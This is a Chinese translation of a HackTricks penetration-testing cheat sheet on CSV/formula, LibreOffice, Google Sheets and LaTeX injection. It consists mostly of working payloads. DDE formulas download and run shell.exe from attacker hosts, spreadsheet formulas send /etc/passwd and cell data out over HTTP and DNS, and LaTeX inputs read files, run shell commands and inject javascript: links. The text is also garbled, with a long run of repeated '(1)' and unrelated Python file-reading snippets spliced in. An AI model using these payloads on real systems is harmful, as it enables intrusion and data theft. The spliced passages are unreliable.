18 KiB
公式/CSV/文档/LaTeX注入
☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组,或者关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。
找到最重要的漏洞,以便您可以更快地修复它们。Intruder跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从API到Web应用程序和云系统。立即免费试用。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
公式注入
信息
如果您的输入被反射到CSV文件(或任何其他可能被Excel打开的文件)中,您可能可以放置Excel公式,当用户打开文件或用户在Excel表格中点击某个链接时,这些公式将被执行。
{% hint style="danger" %} 现在的Excel会警告(多次)用户当从Excel外部加载内容时,以防止他进行恶意操作。因此,必须对社会工程学进行特殊努力以获得最终有效载荷。 {% endhint %}
字典
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
超链接
以下示例非常有用,可以从最终的Excel表中窃取内容并向任意位置发送请求。但是需要用户点击链接(并接受警告提示)。
示例来自https://payatu.com/csv-injection-basic-to-exploit
让我们假设一个学校的学生记录管理系统的攻击场景。该应用程序允许教师输入学生的详细信息。攻击者获得了对应用程序的访问权限,并希望所有使用该应用程序的教师都受到威胁。因此,攻击者尝试通过Web应用程序执行CSV注入攻击。
攻击者需要窃取其他学生的详细信息。因此,攻击者在输入学生详细信息时使用了超链接公式。
当教师导出CSV并点击超链接时,敏感数据将被发送到攻击者的服务器。
导出的CSV文件中包含恶意有效负载。
学生详细信息被记录在攻击者的Web服务器中。
RCE
为了使此示例工作,需要启用以下配置:
文件 → 选项 → 信任中心 → 信任中心设置 → 外部内容 → 启用动态数据交换服务器启动
或使用旧版本的Excel。
好消息是,当打开文件时,此有效负载会自动执行(如果用户接受警告)。
可以使用以下有效负载执行计算器 =cmd|' /C calc'!xxx
 (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
LFI
LibreOffice Calc
- 这将从本地的/etc/passwd文件中读取第一行:
='file:///etc/passwd'#$passwd.A1 - 将其外泄:
=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1))) - 外泄多行:
=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2))) - DNS外泄:
=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))
分析DNS外泄负载:
- ‘file:///etc/passwd’#$passwd.A19 – 将从本地的/etc/passwd文件中读取第19行
- ENCODEURL(‘file:///etc/passwd’#$passwd.A19) – 对返回的数据进行URL编码
- MID((ENCODEURL(‘file:///etc/passwd’#$passwd.A19)),1,41) – 类似于子字符串,从第一个字符到第41个字符读取数据,这是一种非常方便的限制DNS主机名长度的方法(FQDN的字符限制为254个字符,标签的字符限制为63个字符,即子域名)
- SUBSTITUTE(MID((ENCODEURL(‘file:///etc/passwd’#$passwd.A19)),1,41),”%”,”-“) – 将所有%(URL编码的特殊字符)的实例替换为破折号,以确保只使用有效的DNS字符
- CONCATENATE((SUBSTITUTE(MID((ENCODEURL(‘file:///etc/passwd’#$passwd.A19)),1,41),”%”,”-“)),”.<FQDN>”) – 将文件的输出(在进行上述处理后)与FQDN(我们可以控制的域的权威主机)连接起来
- WEBSERVICE – 将请求此不存在的DNS名称,然后我们可以解析DNS权威名称服务器上的日志(或运行tcpdump等),而我们对该服务器具有控制权
Google Sheets OOB数据外泄
首先,让我们介绍一些更有趣的函数。
CONCATENATE: 将字符串连接在一起。
=CONCATENATE(A2:E2)
IMPORTXML: 从各种结构化数据类型中导入数据,包括XML、HTML、CSV、TSV以及RSS和ATOM XML订阅源。
=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
IMPORTFEED: 导入一个RSS或ATOM订阅源。
=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))
IMPORTHTML: 从HTML页面中导入表格或列表中的数据。
=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
IMPORTRANGE: 从指定的电子表格中导入一系列单元格。
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
图片:将图片插入到单元格中。
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
LaTeX注入
通常在互联网上找到的将LaTeX代码转换为PDF的服务器使用pdflatex。
该程序使用3个主要属性来(禁止)允许命令执行:
--no-shell-escape:即使在texmf.cnf文件中启用了\write18{command}构造,也会禁用它。--shell-restricted:与--shell-escape相同,但仅限于一组预定义的“安全”命令(在Ubuntu 16.04上,列表位于/usr/share/texmf/web2c/texmf.cnf中)。--shell-escape:启用\write18{command}构造。该命令可以是任何shell命令。出于安全原因,通常禁止使用此构造。
然而,还有其他执行命令的方法,因此为了避免远程命令执行(RCE),使用--shell-restricted非常重要。
读取文件
您可能需要使用[或$等包装器来调整注入。
\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
读取单行文件
To read a single line from a file, you can use the readline() function in Python. This function reads one line at a time from the file and returns it as a string.
file = open('filename.txt', 'r')
line = file.readline()
print(line)
file.close()
The code above opens the file filename.txt in read mode ('r'), reads the first line using readline(), and then prints the line. Finally, the file is closed using the close() method.
You can replace 'filename.txt' with the path to your desired file.
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
读取多行文件
To read a file that contains multiple lines, you can use the following code:
要读取包含多行的文件,可以使用以下代码:
with open('file.txt', 'r') as file:
lines = file.readlines()
for line in lines:
print(line.strip())
This code opens the file named file.txt in read mode ('r') and uses the readlines() method to read all the lines in the file. The lines are then printed one by one using a loop. The strip() method is used to remove any leading or trailing whitespace from each line.
这段代码以读取模式('r')打开名为 file.txt 的文件,并使用 readlines() 方法读取文件中的所有行。然后使用循环逐行打印这些行。strip() 方法用于删除每行开头和结尾的空白字符。
By using this code, you can easily read and process files that contain multiple lines of text.
使用这段代码,您可以轻松读取和处理包含多行文本的文件。
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
写入文件
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
命令执行
命令的输入将被重定向到标准输入(stdin),使用临时文件来获取它。
\immediate\write18{env > output}
\input{output}
\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}
# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}
# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
如果遇到任何LaTex错误,请考虑使用base64来获取结果,以避免不良字符的影响。
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base4
\input{|"/bin/hostname"}
跨站脚本攻击
来自@EdOverflow的信息
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
参考资料
- https://notsosecure.com/data-exfiltration-formula-injection-part1
- https://0day.work/hacking-with-latex/
- https://salmonsec.com/cheatsheet/latex_injection
- https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/
找到最重要的漏洞,以便更快地修复它们。Intruder跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从API到Web应用程序和云系统。立即免费试用。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 您在网络安全公司工作吗?您想在HackTricks中看到您的公司广告吗?或者您想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获得官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组,或在Twitter上关注我🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享您的黑客技巧。